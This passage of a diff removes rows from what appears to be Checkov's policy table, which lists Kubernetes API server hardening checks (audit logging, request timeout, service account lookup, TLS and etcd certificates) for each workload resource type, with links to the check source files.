-| 3100 | CKV_K8S_91               | resource                         | ReplicationController                                                                            | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                    |
-| 3101 | CKV_K8S_91               | resource                         | StatefulSet                                                                                      | Ensure that the --audit-log-path argument is set                                                                                                                                                         | Kubernetes              | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py)                                                                                    |
-| 3102 | CKV_K8S_92               | resource                         | CronJob                                                                                          | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                        |
-| 3103 | CKV_K8S_92               | resource                         | DaemonSet                                                                                        | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                        |
-| 3104 | CKV_K8S_92               | resource                         | Deployment                                                                                       | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                        |
-| 3105 | CKV_K8S_92               | resource                         | DeploymentConfig                                                                                 | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                        |
-| 3106 | CKV_K8S_92               | resource                         | Job                                                                                              | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                        |
-| 3107 | CKV_K8S_92               | resource                         | Pod                                                                                              | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                        |
-| 3108 | CKV_K8S_92               | resource                         | PodTemplate                                                                                      | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                        |
-| 3109 | CKV_K8S_92               | resource                         | ReplicaSet                                                                                       | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                        |
-| 3110 | CKV_K8S_92               | resource                         | ReplicationController                                                                            | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                        |
-| 3111 | CKV_K8S_92               | resource                         | StatefulSet                                                                                      | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate                                                                                                                               | Kubernetes              | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py)                                                                        |
-| 3112 | CKV_K8S_93               | resource                         | CronJob                                                                                          | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                  |
-| 3113 | CKV_K8S_93               | resource                         | DaemonSet                                                                                        | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                  |
-| 3114 | CKV_K8S_93               | resource                         | Deployment                                                                                       | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                  |
-| 3115 | CKV_K8S_93               | resource                         | DeploymentConfig                                                                                 | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                  |
-| 3116 | CKV_K8S_93               | resource                         | Job                                                                                              | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                  |
-| 3117 | CKV_K8S_93               | resource                         | Pod                                                                                              | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                  |
-| 3118 | CKV_K8S_93               | resource                         | PodTemplate                                                                                      | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                  |
-| 3119 | CKV_K8S_93               | resource                         | ReplicaSet                                                                                       | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                  |
-| 3120 | CKV_K8S_93               | resource                         | ReplicationController                                                                            | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                  |
-| 3121 | CKV_K8S_93               | resource                         | StatefulSet                                                                                      | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate                                                                                                                            | Kubernetes              | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py)                                                                  |
-| 3122 | CKV_K8S_94               | resource                         | CronJob                                                                                          | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                      |
-| 3123 | CKV_K8S_94               | resource                         | DaemonSet                                                                                        | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                      |
-| 3124 | CKV_K8S_94               | resource                         | Deployment                                                                                       | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                      |
-| 3125 | CKV_K8S_94               | resource                         | DeploymentConfig                                                                                 | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                      |
-| 3126 | CKV_K8S_94               | resource                         | Job                                                                                              | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                      |
-| 3127 | CKV_K8S_94               | resource                         | Pod                                                                                              | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                      |
-| 3128 | CKV_K8S_94               | resource                         | PodTemplate                                                                                      | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                      |
-| 3129 | CKV_K8S_94               | resource                         | ReplicaSet                                                                                       | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                      |
-| 3130 | CKV_K8S_94               | resource                         | ReplicationController                                                                            | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                      |
-| 3131 | CKV_K8S_94               | resource                         | StatefulSet                                                                                      | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate                                                                                                                             | Kubernetes              | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py)                                                                      |
-| 3132 | CKV_K8S_95               | resource                         | CronJob                                                                                          | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                        |
-| 3133 | CKV_K8S_95               | resource                         | DaemonSet                                                                                        | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                        |
-| 3134 | CKV_K8S_95               | resource                         | Deployment                                                                                       | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                        |
-| 3135 | CKV_K8S_95               | resource                         | DeploymentConfig                                                                                 | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                        |
-| 3136 | CKV_K8S_95               | resource                         | Job                                                                                              | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                        |
-| 3137 | CKV_K8S_95               | resource                         | Pod                                                                                              | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                        |
-| 3138 | CKV_K8S_95               | resource                         | PodTemplate                                                                                      | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                        |
-| 3139 | CKV_K8S_95               | resource                         | ReplicaSet                                                                                       | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                        |
-| 3140 | CKV_K8S_95               | resource                         | ReplicationController                                                                            | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                        |
-| 3141 | CKV_K8S_95               | resource                         | StatefulSet                                                                                      | Ensure that the --request-timeout argument is set as appropriate                                                                                                                                         | Kubernetes              | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py)                                                                        |
-| 3142 | CKV_K8S_96               | resource                         | CronJob                                                                                          | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                            |
-| 3143 | CKV_K8S_96               | resource                         | DaemonSet                                                                                        | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                            |
-| 3144 | CKV_K8S_96               | resource                         | Deployment                                                                                       | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                            |
-| 3145 | CKV_K8S_96               | resource                         | DeploymentConfig                                                                                 | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                            |
-| 3146 | CKV_K8S_96               | resource                         | Job                                                                                              | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                            |
-| 3147 | CKV_K8S_96               | resource                         | Pod                                                                                              | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                            |
-| 3148 | CKV_K8S_96               | resource                         | PodTemplate                                                                                      | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                            |
-| 3149 | CKV_K8S_96               | resource                         | ReplicaSet                                                                                       | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                            |
-| 3150 | CKV_K8S_96               | resource                         | ReplicationController                                                                            | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                            |
-| 3151 | CKV_K8S_96               | resource                         | StatefulSet                                                                                      | Ensure that the --service-account-lookup argument is set to true                                                                                                                                         | Kubernetes              | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py)                                                            |
-| 3152 | CKV_K8S_97               | resource                         | CronJob                                                                                          | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                          |
-| 3153 | CKV_K8S_97               | resource                         | DaemonSet                                                                                        | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                          |
-| 3154 | CKV_K8S_97               | resource                         | Deployment                                                                                       | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                          |
-| 3155 | CKV_K8S_97               | resource                         | DeploymentConfig                                                                                 | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                          |
-| 3156 | CKV_K8S_97               | resource                         | Job                                                                                              | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                          |
-| 3157 | CKV_K8S_97               | resource                         | Pod                                                                                              | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                          |
-| 3158 | CKV_K8S_97               | resource                         | PodTemplate                                                                                      | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                          |
-| 3159 | CKV_K8S_97               | resource                         | ReplicaSet                                                                                       | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                          |
-| 3160 | CKV_K8S_97               | resource                         | ReplicationController                                                                            | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                          |
-| 3161 | CKV_K8S_97               | resource                         | StatefulSet                                                                                      | Ensure that the --service-account-key-file argument is set as appropriate                                                                                                                                | Kubernetes              | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py)                                                          |
-| 3162 | CKV_K8S_99               | resource                         | CronJob                                                                                          | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                        |
-| 3163 | CKV_K8S_99               | resource                         | DaemonSet                                                                                        | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                        |
-| 3164 | CKV_K8S_99               | resource                         | Deployment                                                                                       | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                        |
-| 3165 | CKV_K8S_99               | resource                         | DeploymentConfig                                                                                 | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                        |
-| 3166 | CKV_K8S_99               | resource                         | Job                                                                                              | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                        |
-| 3167 | CKV_K8S_99               | resource                         | Pod                                                                                              | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                        |
-| 3168 | CKV_K8S_99               | resource                         | PodTemplate                                                                                      | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                        |
-| 3169 | CKV_K8S_99               | resource                         | ReplicaSet                                                                                       | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                        |
-| 3170 | CKV_K8S_99               | resource                         | ReplicationController                                                                            | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                        |
-| 3171 | CKV_K8S_99               | resource                         | StatefulSet                                                                                      | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate                                                                                                                      | Kubernetes              | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py)                                                                        |
-| 3172 | CKV_K8S_100              | resource                         | CronJob                                                                                          | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                          |
-| 3173 | CKV_K8S_100              | resource                         | DaemonSet                                                                                        | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                          |
-| 3174 | CKV_K8S_100              | resource                         | Deployment                                                                                       | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                          |
-| 3175 | CKV_K8S_100              | resource                         | DeploymentConfig                                                                                 | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                          |
-| 3176 | CKV_K8S_100              | resource                         | Job                                                                                              | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                          |
-| 3177 | CKV_K8S_100              | resource                         | Pod                                                                                              | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                          |
-| 3178 | CKV_K8S_100              | resource                         | PodTemplate                                                                                      | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                          |
-| 3179 | CKV_K8S_100              | resource                         | ReplicaSet                                                                                       | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                          |
-| 3180 | CKV_K8S_100              | resource                         | ReplicationController                                                                            | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                          |
-| 3181 | CKV_K8S_100              | resource                         | StatefulSet                                                                                      | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate                                                                                                              | Kubernetes              | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py)                                                                          |
-| 3182 | CKV_K8S_102              | resource                         | CronJob                                                                                          | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                |
-| 3183 | CKV_K8S_102              | resource                         | DaemonSet                                                                                        | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                |
-| 3184 | CKV_K8S_102              | resource                         | Deployment                                                                                       | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                |
-| 3185 | CKV_K8S_102              | resource                         | DeploymentConfig                                                                                 | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                |
-| 3186 | CKV_K8S_102              | resource                         | Job                                                                                              | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                |
-| 3187 | CKV_K8S_102              | resource                         | Pod                                                                                              | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                |
-| 3188 | CKV_K8S_102              | resource                         | PodTemplate                                                                                      | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                |
-| 3189 | CKV_K8S_102              | resource                         | ReplicaSet                                                                                       | Ensure that the --etcd-cafile argument is set as appropriate                                                                                                                                             | Kubernetes              | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py)                                                                                |
